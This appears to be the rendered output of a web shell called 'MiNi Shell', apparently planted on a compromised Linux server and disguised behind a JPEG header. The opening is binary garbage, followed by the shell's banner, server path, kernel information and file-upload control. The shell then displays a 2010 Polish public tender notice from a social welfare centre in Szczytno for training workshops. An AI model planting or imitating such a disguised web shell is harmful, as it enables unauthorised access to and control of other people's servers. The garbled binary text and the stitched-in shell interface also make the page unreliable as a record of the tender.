JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100518/127265-N-2010.html

<p class="kh_header"><b>Szczytno: usługi polegające na zorganizowaniu i przeprowadzeniu warsztatów szkoleniowych dla beneficjentów ostatecznych (wyłonionych spośród klientów GOPS) w ramach projektu systemowego Aktywność i Integracja szansą na przyszłość</b><br>
<b>Numer ogłoszenia: 127265 - 2010; data zamieszczenia: 18.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej  w Szczytnie , ul. Polska 49, 12-100 Szczytno, woj. warmińsko-mazurskie, tel. 0-89 624 01 84, faks 0-89 624 01 84.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://szczytnogw.1.e-bip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi polegające na zorganizowaniu i przeprowadzeniu warsztatów szkoleniowych dla beneficjentów ostatecznych (wyłonionych spośród klientów GOPS) w ramach projektu systemowego Aktywność i Integracja szansą na przyszłość.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem Zamówienia są usługi polergające na zorganizowaniu i przeprowadzeniu warsztatów szkoleniowych dla beneficjentów ostatecznych (wyłonionych spośród klientów GOPS) w ramach projektu systemowego Aktywność i Integracja szansą na przyszłość, współfinansowanego ze środków Europejskiego Funduszu Społecznego,  Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej, w zakresie: 
 w ramach kontraktów socjalnych dla 34 osób z terenu gminy wiejskiej Szczytno:
1)Warsztat zastosowanie komputera i internetu w codziennym życiu z obsługą kasy fiskalnej  - 34 osoby  ( 2 grupy po 17 osób, 200 h / grupę,  łącznie 400 h)
2)terapia psychospołeczna - 34 osoby; ( 2 grupy po 17 osób,30h/grupę,łącznie 60h)
3)warsztat kształtowania osobowości z elementami wizażu i stylizacji - 34 osoby     ( 2 grupy po 17 osób, 50 h/grupę, łącznie 100h)
W ramach Programu Aktywności Lokalnej dla 17 osób z terenu gminy wiejskiej Szczytno:
1) terapia psychospołeczna - 17 osób ( 1 grupa, 30 h/ grupę)
2) warsztat grupowe poradnictwo zawodowe - 17 osób (1 grupa, 30h/grupę)
3) warsztat kształtowania osobowości z elementami wizażu i stylizacji - 17 osób    (1 grupa, 50h/grupę).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.31.00-0, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia warunek posiadania uprawnień do organizowania i przeprowadzania szkoleń objętych niniejszym zamówieniem, Zamawiający wymaga aby Wykonawca wykazał, że jest instytucją szkoleniową w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity Dz. U. z 2008 r. Nr 69 poz. 415 z późn. zm.), tj.: posiada wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej. Ocena spełniania tego warunku dokonana będzie przez Zamawiającego poprzez weryfikację wpisu do RIS w elektronicznej bazie danych prowadzonej przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej. Warunek zostanie uznany za spełniony, jeżeli instytucja szkoleniowa będzie figurowała w Rejestrze Instytucji Szkoleniowych jako instytucja aktywna w roku 2010.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnych 3 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  należycie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych co najmniej 3 usług odpowiadających swoim rodzajem usługom stanowiącym przedmiot niniejszego zamówienia tj. - zajęcia / warsztaty grupowe na rzecz klientów pomocy społecznej, osób z kręgu wykluczenia  społecznego, z podanem  ich wartości, przedmiotu, dat wykonania i odbiorców - zgodnie ze wzorem stanowiącym załącznik nr 4 do SIWZ. Do wykazu należy dołączyć dokumenty potwierdzające, że usługi te zostały wykonane lub są wykonywane należycie (referencje minimum 2).
Ocena spełniania tego warunku dokonana będzie przez Zamawiającego wg. formuły spełnia/ nie spełnia na podstawie oświadczeń i dokumentów okreslonych w specyfikacji.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże,że na czas realizacji zamówienia będzie dysponował potencjałem technicznym (lokal, wyposażenie, sprzęt,urządzenia, stanowiska komputerowe) adekwatnym do danego bloku tematycznego zamówienia, określonych szczegółowo w opisie przedmiotu zamówienia zawartego w SIWZ. Ocena spełnienia tego warunku nastąpi na podstawie złożonego wykazu dotyczącym ilości i jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne dla potrzeb zajęć - zgodnie ze wzorem stanowiącym załącznik nr 6 do SIWZ - według formuły spełnia-niespełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że wykonawca spełnia niniejszy warunek, Zamawiający wymaga, 
aby wykonawca dysponował osobami zdolnymi do wykonania zamówienia zgodnie z poniższym opisem dla poszczególnych bloków tematycznych:
- warsztat zastosowanie  komputera i Internetu w codziennym życiu z obsługą kasy fiskalnej
 * posiadanie przez każdego wykładowcę wykształcenia wyższego z tytułem minimum licencjata lub studiów podyplomowych zgodnie z kierunkiem prowadzonego przedmiotu, z przygotowaniem pedagogicznym oraz posiadanie przez każdego wykładowcę doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu w okresie ostatnich 3 lat przed  upływem terminu składania ofert co najmniej 3 szkoleń dla osób dorosłych,
* Wykładowcy, instruktorzy prowadzący zajęcia z obsługi kasy fiskalnej , powinni posiadać wykształcenie minimum średnie z przygotowaniem pedagogicznym,
posiadający  doświadczenie w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu w okresie ostatnich 3 lat przed  upływem terminu składania ofert co najmniej 3 szkoleń dla osób dorosłych,
- terapia psychospołeczna   
* posiadanie przez każdego wykładowcę wykształcenia wyższego z tytułem minimum licencjata lub studiów podyplomowych zgodnie z  programem warsztatów kierunkiem prowadzonych zajęć , z przygotowaniem pedagogicznym i
posiadanie przez każdego wykładowcę doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu  w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej  3 warsztatów  grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego)
c) warsztat kształtowania osobowości z elementami wizażu  i stylizacji
* posiadanie przez  wykładowcę w przypadku zajęć  kształtowania osobowości  wykształcenia wyższego  z tytułem minimum licencjata lub studiów podyplomowych zgodnie z kierunkiem prowadzonych zajęć, z przygotowaniem pedagogicznym i
posiadanie przez każdego wykładowcę, instruktora doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej  3 warsztatów grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego)
* z zakresu elementów wizażu i stylizacji wykładowcy,instruktorzy ,  powinni posiadać  wykształcenie minimum średnie z przygotowaniem pedagogicznym i
posiadający  doświadczenie w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu w okresie ostatnich 3 lat przed  upływem terminu składania ofert co najmniej 3 , warsztatów grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego)
d) terapia psychospołeczna
* posiadanie przez każdego wykładowcę wykształcenia wyższego z tytułem minimum licencjata lub studiów podyplomowych zgodnie z  programem warsztatów kierunkiem prowadzonych zajęć , z przygotowaniem pedagogicznym i posiadanie przez każdego wykładowcę doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu  w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej 3 warsztatów grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego)
e) warsztaty grupowego poradnictwa zawodowego 
* posiadanie przez każdego wykładowcę wykształcenia wyższego z tytułem minimum licencjata lub studiów podyplomowych  z doradztwa zawodowego , z przygotowaniem pedagogicznym i posiadanie przez każdego wykładowcę doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu  w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej 3 warsztatów grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego)
f) warsztat kształtowania osobowości z elementami wizażu i stylizacji
* posiadanie przez każdego wykładowcę, instruktora : wykształcenia minimum średniego lub wyższego z tytułem minimum licencjata lub studiów podyplomowych zgodnie z kierunkiem prowadzonych zajęć, z przygotowaniem pedagogicznym i
posiadanie przez każdego wykładowcę, instruktora doświadczenia w prowadzeniu zajęć w formach pozaszkolnych dla dorosłych, polegającego na przeprowadzeniu w okresie ostatnich 3 lat przed upływem terminu składania ofert co najmniej 3 warsztatów grupowych na rzecz klientów pomocy społecznej (osób z kręgu wykluczenia społecznego
Ocena spełnienia tego warunku nastąpi na podstawie złożonego:
Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia ,wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  - zgodnie ze wzorem stanowiącym załącznik nr 5 do SIWZ - według formuły spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek znajdowania się w odpowiedniej sytuacji ekonomicznej i finansowej, Zamawiający wymaga od Wykonawcy złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp zgodnie ze wzorem treści przedstawionym w załączniku Nr 2 do SIWZ .Ocena spełniania tego warunku dokonana będzie przez Zamawiającego wg. formuły spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>należy dołączyć : 
a) formularz cenowy kosztów ( wzór nr 1 do oferty)- odrębny dla każdego bloku tematycznego; b) Program szkoleń (wzór nr 2 do oferty); c) wyrażenie zgody przez wykładowcę, instruktora na prowadzenie zajęć (wzór nr 3 do oferty);
d) oświadczenie instytucji o wyrażeniu zgody na udostępnienie i wynajęcie bazy szkoleniowej nie należącej do wykonawcy ( wzór nr 4 do oferty);
e) wstępny harmonogram zajęć- odrębny dla każdego bloku tematycznego ( wzór nr 5 do oferty)
f) zaparafowany na każdej stronie projekt umowy, której wzór stanowi załącznik nr 7 SIWZ;
g) pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjasnień w oryginale lub poświadczone notarialnie, jeżeli osobą podpisującą ofertę i załączniki do oferty nie jest osoba uprawniona do reprezentowania wykonawcy, zgodnie z reprezentacją wynikającą z załączonego do oferty zaświadczenia o wpisie do ewidencji działalności gospodarczej lub odpisu z właściwego rejestru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)zmiany terminu rozpoczęcia lub zakończenia zajęć wywołanej w szczególności nieskompletowaniem na czas pełnej grupy szkoleniowej lub przyczynami niezależnymi od Wykonawcy i Zamawiającego (np. działania siły wyższej), 2)zmiany w kadrze dydaktycznej, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy. Zmiana ta nie może prowadzić do obniżenia wymagań określonych w SIWZ. Jeżeli Zamawiający uzna, że przyczyna jest uzasadniona Wykonawca musi przedstawić nową kandydaturę o kwalifikacjach spełniających kryteria zawarte w SIWZ, 3)zmiany miejsca realizacji zajęć, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych określonych w SIWZ, 4) zmiany harmonogramu zajęć  w uzasadnionych przypadkach i za zgodą Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://szczytnogw.1.e-bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Ośrodek Pomocy Społecznej w Szczytnie ul. Polska 49; 12-100 Szczytno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2010 godzina 09:00, miejsce: siedziba Zamawiającego: ul. Polska 49; 12-100 Szczytno; pokój nr 304 -III piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt systemowy Aktywność i Integracja szansą na przyszłość współfinansowany ze środków Europejskiego Funduszu Społecznego,  Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej,.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com